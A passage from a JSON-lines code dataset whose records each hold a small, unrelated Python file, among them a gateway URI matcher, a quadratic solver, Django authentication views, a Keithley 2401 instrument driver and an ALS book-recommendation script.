gateway.host or isinstance(gateway.host, str), 'Invalid host %s' % gateway.host\n# \n# gateway.protocol = obj.get('Protocol')\n# assert not gateway.protocol or isinstance(gateway.protocol, str), 'Invalid protocol %s' % gateway.protocol\n \n gateway.navigate = obj.get('Navigate')\n assert not gateway.navigate or isinstance(gateway.navigate, str), 'Invalid navigate %s' % gateway.navigate\n \n gateway.putHeaders = obj.get('PutHeaders')\n assert not gateway.putHeaders or isinstance(gateway.putHeaders, dict), 'Invalid put headers %s' % gateway.putHeaders\n \n return identifier\n \n# --------------------------------------------------------------------\n\nclass Identifier:\n '''\n Class that maps the gateway identifier.\n '''\n __slots__ = ('gateway', 'clients', 'pattern', 'headers', 'errors', 'methods')\n \n def __init__(self, gateway):\n '''\n Construct the identifier for the provided gateway.\n \n @param gateway: GatewayRepository\n The gateway for the identifier.\n '''\n assert isinstance(gateway, GatewayRepository), 'Invalid gateway %s' % gateway\n self.gateway = gateway\n \n self.clients = []\n self.pattern = None\n self.headers = []\n self.errors = set()\n self.methods = set()\n\nclass Repository(IRepository):\n '''\n The gateways repository.\n '''\n __slots__ = ('_clientIP', '_identifiers', '_Match')\n \n def __init__(self, clientIP, identifiers, Match):\n '''\n Construct the gateways repository based on the provided dictionary object.\n \n @param identifiers: list[Identifier]\n The identifiers to be used by the repository.\n '''\n assert clientIP is None or isinstance(clientIP, str), 'Invalid client IP %s' % clientIP\n assert isinstance(identifiers, list), 'Invalid identifiers %s' % identifiers\n assert issubclass(Match, MatchRepository), 'Invalid match class %s' % Match\n \n self._clientIP = clientIP\n self._identifiers = identifiers\n self._Match = Match\n \n def find(self, method=None, headers=None, uri=None, error=None):\n '''\n @see: IRepository.find\n '''\n for identifier in self._identifiers:\n assert isinstance(identifier, Identifier), 'Invalid identifier %s' % identifier\n \n if identifier.clients and self._clientIP is not None:\n for client in identifier.clients:\n if client.match(self._clientIP): break\n else: return\n \n groupsURI = self._macth(identifier, method, headers, uri, error)\n if groupsURI is not None: return self._Match(gateway=identifier.gateway, groupsURI=groupsURI)\n \n def allowsFor(self, headers=None, uri=None):\n '''\n @see: IRepository.allowsFor\n '''\n allowed = set()\n for identifier in self._identifiers:\n assert isinstance(identifier, Identifier), 'Invalid identifier %s' % identifier\n groupsURI = self._macth(identifier, None, headers, uri, None)\n if groupsURI is not None: allowed.update(identifier.methods)\n # We need to remove auxiliar methods\n allowed.discard(HTTP_OPTIONS)\n return allowed\n\n # ----------------------------------------------------------------\n \n def _macth(self, identifier, method, headers, uri, error):\n '''\n Checks the match for the provided identifier and parameters.\n \n @return: tuple(string)|None\n The URI match groups, None if there is no match.\n '''\n assert isinstance(identifier, Identifier)\n groupsURI = ()\n \n if method is not None:\n assert isinstance(method, str), 'Invalid method %s' % method\n if identifier.methods:\n if method.upper() not in identifier.methods: return\n \n if headers is not None:\n assert isinstance(headers, dict), 'Invalid headers %s' % uri\n isOk = False\n if identifier.headers:\n for nameValue in headers.items():\n header = '%s:%s' % nameValue\n for pattern in identifier.headers:\n if pattern.match(header):\n isOk = True\n break\n if isOk: break\n if not isOk: return\n elif identifier.headers: return\n \n if uri is not None:\n assert isinstance(uri, str), 'Invalid URI %s' % uri\n if identifier.pattern:\n matcher = identifier.pattern.match(uri)\n if matcher: groupsURI = matcher.groups()\n else: return\n elif identifier.pattern: return\n \n if error is not None:\n assert isinstance(error, int), 'Invalid error %s' % error\n if identifier.errors:\n if error not in identifier.errors: return\n else: return\n elif identifier.errors: return\n \n return groupsURI\n","sub_path":"components/service-gateway/ally/gateway/http/impl/processor/respository.py","file_name":"respository.py","file_ext":"py","file_size_in_byte":14823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"553721070","text":"#50\nimport math\ndziesietna = int(input(\"Podaj dowolną liczbę dziesiętną: \"))\nst = str(dziesietna)+\"(10)=\"\ns = \"\"\nwork = True\n\nwhile work:\n if(dziesietna == 1):\n work = False\n s = s+\"1\"\n else:\n \n if dziesietna%2 == 0:\n s = s+\"0\"\n dziesietna = dziesietna/2\n else:\n s = s+\"1\"\n dziesietna = math.floor(dziesietna/2)\ns = s[len(s)::-1]\nst = st+s+\"(2)\"\nprint(st)\n\n\n# s = s +str(dziesietna%2)\n# dziesietna = math.floor(dziesietna/2)\n# if dziesietna == 1:\n# work = False\n \n#s = s+\"1\"\n","sub_path":"02-ControlStructures/zadanie50.py","file_name":"zadanie50.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"387579345","text":"#!/usr/bin/python3\n''' script lists all state objects with name passed\n as argument from database hbtn_0e_6_usa\n'''\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport sys\n\nif __name__ == '__main__':\n\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'\n .format(sys.argv[1], sys.argv[2], sys.argv[3]),\n pool_pre_ping=True)\n session_m = sessionmaker(bind=engine)\n session = session_m()\n stateID = session.query(State).filter_by(name=sys.argv[4]).first()\n if stateID:\n print(stateID.id)\n else:\n print(\"Not found\")\n session.close()\n","sub_path":"0x0F-python-object_relational_mapping/10-model_state_my_get.py","file_name":"10-model_state_my_get.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"618126098","text":"import math\nimport random\n\n\ndef get_onsphere_point(r):\n theta = random.uniform(0, math.pi*2)\n u = random.uniform(-1., 1.)\n a = math.sqrt(1. - u*u)\n\n point = (\n r * math.cos(theta) * a,\n r * math.sin(theta) * a,\n r * u\n )\n\n return point\n\n\ndef get_sphere_points_population(n, r):\n for i in range(n):\n yield get_onsphere_point(r)\n\n\nif __name__ == '__main__':\n n = 1500\n r = 4000\n points = list(get_sphere_points_population(n, r))\n","sub_path":"math/points_on_sphere_distr/random_sphere.py","file_name":"random_sphere.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"530355318","text":"import math\n\n\n# function for finding roots\ndef getX(a, b, c):\n\n # calculating discriminant using formula\n dis = b * b - 4 * a * c\n sqrt_val = math.sqrt(abs(dis))\n\n # find the values of X\n ans1 = ((-b + sqrt_val)/(2 * a))\n ans2 = ((-b - sqrt_val)/(2 * a))\n\n # returning the larger value\n if ans1 > ans2:\n return print(ans1)\n else:\n return print(ans2)\n\n\n# getting input\n# getting rid of ValueError\ntry:\n a = int(input('Input a: '))\n b = int(input('Input b: '))\n c = int(input('Input c: '))\nexcept ValueError:\n print(\"Invalid input\")\n\n# calling the function\ntry:\n if a == 0:\n print(\"Input correct quadratic equation\")\n else:\n getX(a, b, c)\nexcept NameError:\n print(\"Invalid input\")\n","sub_path":"kevogaba.py","file_name":"kevogaba.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"128512603","text":"\ndef run(env, agent):\n \"\"\"\n Analyze the behavior of your trained policies using the environment and agent from your RL\n experiment. The environment is likely wrapped by the MultiAgentWrapper; you\n can use the unwrapped property to get the Simulation Manager.\n \"\"\"\n\n env = env.unwrapped\n\n # Run the simulation with actions chosen from the trained policies\n policy_agent_mapping = agent.config['multiagent']['policy_mapping_fn']\n # for episode in range(num_episodes):\n for episode in range(100):\n print('Episode: {}'.format(episode))\n obs = env.reset()\n while True: # Run until the episode ends\n # Get actions from policies\n joint_action = {}\n for agent_id, agent_obs in obs.items():\n policy_id = policy_agent_mapping(agent_id)\n action = agent.compute_action(agent_obs, policy_id=policy_id)\n joint_action[agent_id] = action\n # Step the environment\n obs, reward, done, info = env.step(joint_action)\n if done['__all__']:\n break\n","sub_path":"examples/analysis_prototype.py","file_name":"analysis_prototype.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"179900656","text":"import json, os\nfrom solcx import compile_source\n\n\ncontract = os.path.join(os.getcwd(), '..', '..', 'Contract', 'KYCWallet_Contract_UPDATED.sol')\n\nwith open(contract, 'r') as f:\n source = f.read()\n\ncompiled_contract = compile_source(source)\n\nfactory_filepath = os.path.join(os.getcwd(), 'walletFactory')\nwallet_filepath = os.path.join(os.getcwd(), 'walletContract')\n\nwith open(factory_filepath, 'w') as f:\n json.dump(compiled_contract[':WalletFactory'], f)\n\nwith open(wallet_filepath, 'w') as w:\n json.dump(compiled_contract[':KYC_Wallet'], w)","sub_path":"KYC_WalletApp/w3/compile_contract.py","file_name":"compile_contract.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"251445719","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom authapp.forms import ShopUserLoginForm, ShopUserRegisterForm, ShopUserEditForm, ShopUserProfileEditForm\nfrom django.contrib import auth\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\nfrom basketapp.models import Basket\nfrom mainapp.models import Category\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom authapp.models import ShopUser\nfrom django.db import transaction\n\n\n\ndef login(request):\n\n next = request.GET['next'] if 'next' in request.GET.keys() else ''\n\n if request.method == 'POST':\n\n login_form = ShopUserLoginForm(data=request.POST)\n if login_form.is_valid():\n username = request.POST['username']\n password = request.POST['password']\n\n user = auth.authenticate(username=username, password=password)\n if user and user.is_active:\n auth.login(request, user)\n if 'next' in request.POST.keys():\n return HttpResponseRedirect(request.POST['next'])\n else:\n return HttpResponseRedirect(reverse('mainapp:main'))\n else:\n login_form = ShopUserLoginForm()\n\n content = {\n 'login_form': login_form,\n 'next': next\n }\n\n return render(request, 'login.html', content)\n\ndef login_after_registration(request):\n return render(request, 'login_a_r.html')\n\ndef logout(request):\n auth.logout(request)\n return HttpResponseRedirect(reverse('mainapp:main'))\n\n\ndef register(request):\n\n if request.method == 'POST':\n register_form = ShopUserRegisterForm(request.POST, request.FILES)\n\n if register_form.is_valid():\n user = register_form.save()\n if send_verify_mail(user):\n print('сообщение подтверждения отправлено')\n return HttpResponseRedirect(reverse('authapp:login_a_r'))\n else:\n print('ошибка отправки сообщения')\n return HttpResponseRedirect(reverse('authapp:login'))\n else:\n register_form = ShopUserRegisterForm()\n\n content = {\n 'register_form': register_form,\n }\n\n return render(request, 'register.html', content)\n\n# @login_required\n# def edit(request):\n# basket = []\n# if request.user.is_authenticated:\n# basket = Basket.objects.filter(user=request.user)\n# if request.method == 'POST':\n# edit_form = ShopUserEditForm(request.POST, request.FILES, instance=request.user)\n# if edit_form.is_valid():\n# edit_form.save()\n# return HttpResponseRedirect(reverse('auth:edit'))\n# else:\n# edit_form = ShopUserEditForm(instance=request.user)\n#\n# content = {\n# 'edit_form': edit_form,\n# 'basket': basket,\n# 'categories': categories\n# }\n#\n# return render(request, 'edit.html', content)\n\n\ndef send_verify_mail(user):\n verify_link = reverse('auth:verify', args=[user.pk, user.activation_key])\n\n title = 'Подтверждение учетной записи {}'.format(user.username)\n\n message = 'Для подтверждения учетной записи {} на портале \\\n{} перейдите по ссылке: \\n{}{}'.format(user.username, settings.DOMAIN_NAME, settings.DOMAIN_NAME, verify_link)\n\n return send_mail(title, message, settings.EMAIL_HOST_USER, [user.email], fail_silently=False)\n\n\ndef verify(request, pk, activation_key):\n try:\n user = ShopUser.objects.get(pk=pk)\n if user.activation_key == activation_key and not user.is_activation_key_expired():\n user.is_active = True\n user.save()\n auth.login(request, user, backend='django.contrib.auth.backends.ModelBackend')\n return render(request, 'verification.html')\n else:\n print('error activation user: {}'.format(user))\n return render(request, 'verification.html')\n except Exception as e:\n print('error activation user : {}'.format(e.args))\n return HttpResponseRedirect(reverse('authapp:login'))\n\n\n@transaction.atomic\n@login_required\ndef edit(request):\n\n if request.method == 'POST':\n edit_form = ShopUserEditForm(request.POST, request.FILES, instance=request.user)\n profile_form = ShopUserProfileEditForm(request.POST, instance=request.user.shopuserprofile)\n if edit_form.is_valid() and profile_form.is_valid():\n edit_form.save()\n return HttpResponseRedirect(reverse('auth:edit'))\n else:\n edit_form = ShopUserEditForm(instance=request.user)\n profile_form = ShopUserProfileEditForm(\n instance=request.user.shopuserprofile\n )\n\n content = {\n 'edit_form': edit_form,\n 'profile_form': profile_form\n }\n return render(request, 'edit.html', content)","sub_path":"authapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441970195","text":"import codecs, re, random\nfrom collections import Counter\nimport numpy as np\nfrom separator import Separator\nfrom konlpy.tag import Mecab\n\n# indexes sentences by vocab frequency list\n# reserves 0 for UNKs\n# todo: probably shoulda used sklearn.####vectorizer\n\n# USAGE\n# first get lists like this:\n# sents, classes = dataset.get_lists(sents_filename, classes_filename)\n# then run train-test split like this:\n# train_X, train_y, test_X, test_y, test_set, class_set = \\\n# dataset.get_test_train(sents, classes, trainsize=0.8, max_vocab=50000):\n\n# function to get lists from data\n# takes corpus as filename (headlines, articles on alternate lines)\n# returns lists of sentence token lists, classes\ndef get_lists(file_corpus, testing=0):\n if testing == 1:\n print('starting dataset.get_lists()...')\n f_corpus = codecs.open(file_corpus, 'rb', encoding='utf8')\n sents = []\n heads = []\n counter = 0\n\n for line in f_corpus:\n if counter % 2 == 0:\n heads.append(line.strip('\\n').split(' '))\n else:\n sents.append(line.strip('\\n').split(' '))\n counter += 1\n return(sents, heads)\n\n\ndef get_texts(file_corpus, testing=0):\n if testing == 1:\n print('starting dataset.get_lists()...')\n f_corpus = codecs.open(file_corpus, 'rb', encoding='utf8')\n sents = []\n heads = []\n counter = 0\n\n for line in f_corpus:\n if counter % 2 == 0:\n heads.append(line.strip('\\n'))\n else:\n sents.append(line.strip('\\n'))\n counter += 1\n return(sents, heads)\n\n\n# function to get vocab, maxvocab\n# takes list : sents\ndef get_vocab(sents, heads, testing=0):\n if testing == 1:\n print('starting dataset.get_vocab()...')\n # get vocab list\n vocab = []\n for sent in sents:\n for word in sent:\n vocab.append(word)\n for sent in heads:\n for word in sent:\n vocab.append(word)\n\n counts = Counter(vocab) # get counts of each word\n vocab_set = list(set(vocab)) # get unique vocab list\n sorted_vocab = sorted(vocab_set, key=lambda x: -counts[x]) # sort by counts\n\n if testing==1:\n print(\"get_vocab[:10]:\", sorted_vocab[:10])\n\n return(sorted_vocab)\n\n\n# function to convert sents to vectors\n# takes list : sents, int : max vocab\n# returns list of vectors (as lists)\ndef index_sents(sents, vocab, max_vocab, testing=0):\n if testing==1:\n print(\"starting vectorize_sents()...\")\n # get sorted vocab\n vectors = []\n # iterate thru sents\n for sent in sents:\n sent_vect = []\n sentlist = sent.split(' ')\n for word in sentlist:\n if word in vocab.keys():\n idx = vocab[word] + 1 # reserve 0 for UNK / OOV\n if idx < max_vocab: # in max_vocab range\n sent_vect.append(idx)\n else: # out of max_vocab range or OOV\n sent_vect.append(0)\n vectors.append(sent_vect)\n return(vectors)\n\n\ndef onehot_vectorize_sents(sents, vocab, max_vocab, testing=0):\n if testing==1:\n print(\"starting vectorize_sents()...\")\n # get sorted vocab\n vectors = []\n # iterate thru sents\n for sent in sents:\n sent_vect = []\n for word in sent:\n one_hot = []\n idx = vocab.index(word) + 1 # reserve 0 for UNK / OOV\n for i in range(max_vocab+1):\n if i == idx: # matching\n one_hot.append(1)\n else:\n one_hot.append(0)\n sent_vect.append(one_hot)\n vectors.append(sent_vect)\n if testing==1:\n print(\"onehot_vectorize_sents[:10]:\", vectors[0])\n return(vectors)\n\n\n# function to return lists of graphemes\n# takes sentence as string\n# returns list of graphemes\ndef grapheme_splitter(sent):\n sentlist = sent.strip().split(' ')\n graphlist = []\n for word in sentlist:\n wordlist = list(word)\n for syllable in wordlist:\n # find korean words\n if re.findall(r'[[\\uac00-\\ud7a3]|[\\u1100-\\u11ff]]+', syllable):\n graphlist += Separator(syllable).sep_all\n else:\n graphlist.append(syllable)\n return graphlist\n\n\n# function to return lexicalized morphs from mecab\n# takes sentence as string\n# returns space-separated string of lexicalized morphemes\ndef mecab_tokenize(sent):\n\n\n return\n\ndef kkma_tokenize(sents):\n from konlpy.tag import Kkma\n kkma = Kkma()\n lex_sents = []\n # POS-tag and get lexical form from morphemes using KONLPY\n for sent in sents:\n lex_sents.append(' '.join(kkma.morphs(sent)))\n if len(lex_sents) % 200 == 0:\n print(\"kkma: done\", len(lex_sents), \"of\", len(sents), \"total\")\n return lex_sents","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"311723340","text":"from QlernNN_WangJingyan.q_learning_nn import *\nimport numpy as np\nimport sys\n\ndef random_agent(env, num_episodes, max_steps_per_episode=500):\n \n stats = EpisodeStats(\n episode_lengths=np.zeros(num_episodes),\n episode_rewards=np.zeros(num_episodes)) \n \n for i_episode in range(num_episodes):\n sys.stdout.flush()\n state = env.reset()\n\n for t in range(max_steps_per_episode):\n next_state, reward, done, _ = env.step(action=np.random.choice(env.action_space.n))\n\n stats.episode_rewards[i_episode] += reward\n stats.episode_lengths[i_episode] = t+1\n\n if done :\n print(\"\\repisode:{}/{} score:{}\".format(i_episode, num_episodes, t+1), end=\"\")\n break\n \n state = next_state \n\n return stats\n\n","sub_path":"RandomAgent_WangJingyan/random_agent.py","file_name":"random_agent.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"293428140","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nfrom utils.evaluator import *\nfrom sklearn.preprocessing import OneHotEncoder\n\nimport os\n\n\ndef preprocessing(dfdata):\n dfresult = pd.DataFrame()\n\n #Pclass\n dfPclass = pd.get_dummies(dfdata['Pclass'])\n dfPclass.columns = ['Pclass' + str(x) for x in dfPclass.columns]\n dfresult = pd.concat([dfresult, dfPclass], axis=1)\n\n #Sex\n dfSex = pd.get_dummies(dfdata['Sex'])\n dfresult = pd.concat([dfresult, dfSex], axis=1)\n\n #age\n dfresult['Age'] = dfdata['Age'].fillna(0)\n dfresult['Age_null'] = pd.isna(dfdata['Age']).astype('int32')\n\n #SibSp, Parch, Fare\n dfresult['SibSp'] = dfdata['SibSp']\n dfresult['Parch'] = dfdata['Parch']\n dfresult['Fare'] = dfdata['Fare']\n\n #Cabin\n dfresult['Cabin_null'] = pd.isna(dfdata['Cabin']).astype('int32')\n\n #Embarked\n dfEmbarked = pd.get_dummies(dfdata['Embarked'], dummy_na=True)\n dfEmbarked.columns = ['Embarked_' + str(x) for x in dfEmbarked.columns]\n dfresult = pd.concat([dfresult, dfEmbarked], axis=1)\n\n return dfresult.values\n\n\ndef build_graph(input_dim):\n def weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n def bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n def fc(in_shape, out_shape, input, name_space):\n with tf.name_scope(name_space):\n w_fc = weight_variable([in_shape, out_shape])\n b_fc = bias_variable([out_shape])\n output_fc = tf.matmul(input, w_fc) + b_fc\n return output_fc\n\n x = tf.placeholder(tf.float32, [None, input_dim], name='x-input')\n y_ = tf.placeholder(tf.int64, [None, ], name='y-input')\n y_onehot_ = tf.placeholder(tf.float32, [None, 2], name='y-onehot')\n\n out_fc1 = tf.nn.relu(fc(input_dim, 100, x, 'fc1'))\n out_fc2 = tf.nn.relu(fc(100, 20, out_fc1, 'fc2'))\n out_fc3 = tf.nn.relu(fc(20, 20, out_fc2, 'fc2.1'))\n out_fc4 = tf.nn.relu(fc(20, 20, out_fc3, 'fc2.2'))\n\n # y = tf.nn.softmax(fc(10, 2, out_fc2, 'fc3'), name='softmax-output')\n y = fc(20, 2, out_fc4, 'fc3')\n\n pred = tf.argmax(y, 1, name='pred')\n\n # loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y, labels=y_))\n # loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=y, labels=y_onehot_))\n loss = tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(logits=y, labels=y_onehot_, pos_weight=5.0))\n\n\n\n opt = tf.train.AdamOptimizer(lr).minimize(loss)\n\n correct_prediction = tf.equal(pred, y_)\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n return {'x_input': x, 'y_input': y_, 'y_onehot': y_onehot_, 'softmax-output': y, 'pred': pred, 'loss': loss,\n 'optimization': opt, 'accuracy': accuracy}\n\n\nbz = 64\nlr = 0.01\nepochs = 30\n\nif __name__ == '__main__':\n\n dftrain_raw = pd.read_csv('../data/unbalanced/train.csv')\n dftest_raw = pd.read_csv('../data/unbalanced/test.csv')\n x_train = preprocessing(dftrain_raw)\n x_test = preprocessing(dftest_raw)\n y_train = dftrain_raw['Survived'].values\n y_test = dftest_raw['Survived'].values\n train_size = x_train.shape[0]\n dataset_train = tf.data.Dataset.from_tensor_slices((x_train, y_train))\n dataset_train = dataset_train.batch(bz)\n iterator = dataset_train.make_initializable_iterator()\n features, labels = iterator.get_next()\n\n graph = build_graph(15)\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(epochs):\n sess.run(iterator.initializer)\n i = 0\n while 1:\n feature, label = sess.run([features, labels])\n print(label.shape)\n label_onehot = OneHotEncoder(sparse=False).fit_transform(label.reshape(-1, 1))\n _, acc, loss = sess.run([graph['optimization'], graph['accuracy'], graph['loss']],\n feed_dict={graph['x_input']: feature, graph['y_input']: label, graph['y_onehot']: label_onehot})\n print(\"epoch [{:>2}/{}], iter [{:>2}/{}], loss {:.4f}, accuracy {:.4f}\".\n format(epoch, epochs, i, train_size // bz, loss, acc))\n i += 1\n if i % (train_size // bz) == 0 and i > 0:\n break\n\n y_test_onehot = OneHotEncoder(sparse=False).fit_transform(y_test.reshape(-1, 1))\n y_pred, acc_test = sess.run([graph['pred'], graph['accuracy']], feed_dict={graph['x_input']: x_test, graph['y_input']: y_test, graph['y_onehot']: label_onehot})\n print(\"test accuracy: {:.4f}\".format(acc_test))\n\n # for i in range(10):\n # f, l = sess.run([features, labels])\n # print(i, l)\n # i += 1\n # if i % (train_size // bz) == 0 and i > 0:\n # sess.run(iterator.initializer)\n print(y_pred)\n perf_evaluate(y_test, y_pred)","sub_path":"supervisor-learning/unbalanced_data.py","file_name":"unbalanced_data.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"215831659","text":"import logging\nlog = logging.getLogger(__name__)\n\nfrom spacq.interface.resources import Resource\nfrom spacq.tool.box import Synchronized\n\nfrom ..abstract_device import AbstractDevice\nfrom ..tools import quantity_wrapped\nfrom ..tools import quantity_unwrapped\n\n\"\"\"\nKeithley 2401 SourceMeasure Unit\nApply voltage/current bias and obtain measurements.\n\"\"\"\n\n\nclass sm2401(AbstractDevice):\n\t\"\"\"\n\tInterface for Keithley 2401\n\tNote: Limited implementation, many features are not included\n\t\"\"\"\n\n\t#allowedSourceType = set(['Voltage','Current'])\n\t#allowedSenseType = set(['Voltage','Current'])\n\tallowedOutput = set(['on','off'])\n\n\tdef _setup(self):\n\t\tAbstractDevice._setup(self)\n\n\t\t# Resources.\n\t\tread_only = ['voltageIn', 'currentIn']\n\t\tfor name in read_only:\n\t\t\tself.resources[name] = Resource(self, name)\n\n\t\t#read_write = ['voltageOut', 'currentOut','sourceType','senseType']\n\t\tread_write = ['voltageOut', 'currentOut','output']\n\t\tfor name in read_write:\n\t\t\tself.resources[name] = Resource(self, name, name)\n\n\t\tself.resources['voltageIn'].units = 'V'\n\t\tself.resources['voltageOut'].units = 'V'\n\t\tself.resources['currentIn'].units = 'A'\n\t\tself.resources['currentOut'].units = 'A'\n\t\tself.resources['output'].allowed_values = self.allowedOutput\n\t\tself.currOutputState = -1\n\t\tself.currentOutputCurrent = -88\n\t\tself.currentOutputVoltage = -88\n\t\t#self.resources['sourceType'].allowed_values = self.allowedSourceType\n\t\t#self.resources['senseType'].allowed_values = self.allowedSenseType\n\t\t\n\t@Synchronized()\n\tdef _connected(self):\n\t\tAbstractDevice._connected(self)\n\n\t\t#self.write('configure:voltage:dc')\n\t\t# TODO: Create a default setup?\n\n\t\t# Get output on/off state to determine if we can ask certain things\n\t\tself.currOutputState = int(self.ask('OUTP?'))\n\t\n\t@Synchronized()\n\tdef reset(self):\n\t\t\"\"\"\n\t\tReset the device to its default state.\n\t\t\"\"\"\n\n\t\tlog.info('Resetting \"{0}\".'.format(self.name))\n\t\tself.write('*rst')\n\n\t@property\n\tdef output(self):\n\t\t# Coded setting of the output on/off (1 = on, 0 = off)\n\t\tresult = self.ask('OUTP?')\n\t\tif result == '0':\n\t\t\tself.currOutputState = 0\n\t\t\treturn 'off'\n\t\telif result == '1':\n\t\t\tself.currOutputState = 1\n\t\t\treturn 'on'\n\t\t\n\t@output.setter\n\tdef output(self,value):\n\t\tif value not in self.allowedOutput:\n\t\t\traise ValueError('Invalid Output State: {0}'.format(value))\n\t\t\n\t\tif value == 'off':\n\t\t\toutCode = 0\n\t\t\tself.currOutputState = 0\n\t\telif value == 'on':\n\t\t\toutCode = 1\n\t\t\tself.currOutputState = 1\n\n\t\tself.write('OUTP {0}'.format(outCode))\n\n\t@property\n\t@quantity_wrapped('V')\n\tdef voltageIn(self):\n\t\tif self.currOutputState:\n\t\t\toutString = self.ask('READ?')\n\t\t\t# The output returns a 5 number string, first number is voltage, second is current, third is res\n\t\t\treturn float(outString.split(',')[0])\n\t\telse:\n\t\t\treturn -999\n\t\t\n\t@property\n\t@quantity_wrapped('A')\n\tdef currentIn(self):\n\t\tif self.currOutputState:\n\t\t\toutString = self.ask('READ?')\n\t\t\treturn float(outString.split(',')[1])\n\t\telse:\n\t\t\treturn -999\n\t\t\n\t@property\n\t@quantity_wrapped('V')\n\tdef voltageOut(self):\n\t\tif self.currOutputState:\n\t\t\treturn float(self.ask('SOUR:VOLT?'))\n\t\telse:\n\t\t\treturn self.currentOutputVoltage\n\n\t@voltageOut.setter\n\t@quantity_unwrapped('V')\n\tdef voltageOut(self,value):\n\t\tself.write('SOUR:FUNC VOLT')\n\t\tself.write('SOUR:VOLT:LEV {0}'.format(value))\n\t\tself.currentOutputVoltage = value\n\t\t\n\t@property\n\t@quantity_wrapped('A')\n\tdef currentOut(self):\n\t\tif self.currOutputState:\n\t\t\treturn float(self.ask('SOUR:CURR?'))\n\t\telse:\n\t\t\treturn self.currentOutputCurrent\n\t\n\t@currentOut.setter\n\t@quantity_unwrapped('A')\n\tdef currentOut(self,value):\n\t\t#self.write('SOUR:FUNC CURR')\n\t\tself.write('SOUR:CURR:LEV {0}'.format(value))\n\t\tself.currentOutputCurrent = value\n\n\nname = 'sourceMeter 2401'\nimplementation = sm2401\n","sub_path":"spacq/devices/keithley/sourceMeter2401.py","file_name":"sourceMeter2401.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"478718870","text":"# Import the required libraries\nimport numpy as np\nimport pandas as pd\nfrom pyspark.sql import SparkSession\nfrom pyspark.ml.recommendation import ALS\nfrom pyspark.ml.evaluation import RegressionEvaluator\nfrom pyspark.mllib.evaluation import RegressionMetrics, RankingMetrics\nimport pyspark.sql.functions as func\nfrom pyspark.sql.functions import round, col, expr\nfrom pyspark import SparkContext\n\nspark = SparkSession.builder.appName(\"My_Session\").getOrCreate()\n\n# SparkContext.setSystemProperty('spark.executor.memory', '8g')\n# sc = SparkContext(\"local\", \"App Name\")\n# sc._conf.getAll()\n\n# Load the training, validation and test sets\ntrain = spark.read.parquet('training_set.parquet')\ntrain = train.select(train['user_id'], train['book_id'], train['rating'])\n\nval = spark.read.parquet('validation_set.parquet')\nval = val.select(val['user_id'], val['book_id'], val['rating'])\n\ntest = spark.read.parquet('test_set.parquet')\ntest = test.select(test['user_id'], test['book_id'], test['rating'])\n\n# See some statistics about the train, validation and test data\nprint('Statistics for Training Data: ')\ntrain.describe().show()\nprint('Statistics for Validation Data: ')\nval.describe().show()\nprint('Statistics for Test Data: ')\ntest.describe().show()\n\n# Hyperparameter Tuning\nfor l in np.arange(0.05,0.15,0.01):\n for r in np.arange(10,100,10):\n\n # Create ALS Model\n als = ALS(rank=r,regParam=l,userCol = 'user_id', itemCol = 'book_id', ratingCol = 'rating', coldStartStrategy = 'drop', nonnegative = True)\n\n # Train the model\n model = als.fit(train)\n\n evaluator = RegressionEvaluator(metricName = 'rmse', labelCol = 'rating', predictionCol = 'prediction')\n\n predictions = model.transform(val)\n rmse = evaluator.evaluate(predictions)\n #predictions.show()\n\n predictions1 = model.transform(test)\n rmse1 = evaluator.evaluate(predictions1)\n print('Rank: {} \\tLambda: {:.6f} \\tRMSE Validation: {:.6f} \\tTest Loss: {:.6f}'.format(\n r,\n l,\n rmse,\n rmse1\n ))\n\n# After doing the hyperparameter tuning, ideal values for rank and regParam are: rank = 50 and regParam = 0.09\nr = 50\nl = 0.09\nals = ALS(rank = r, regParam = l, userCol = 'user_id', itemCol = 'book_id', ratingCol = 'rating', coldStartStrategy = 'drop', nonnegative = True)\n\n# Train the model\nmodel = als.fit(train)\n\n# RMSE value evalutation (Regression Metric)\nevaluator = RegressionEvaluator(metricName = 'rmse', labelCol = 'rating', predictionCol = 'prediction')\n\n# Prediction of rating for validation set\npredictions = model.transform(val)\npredictions = 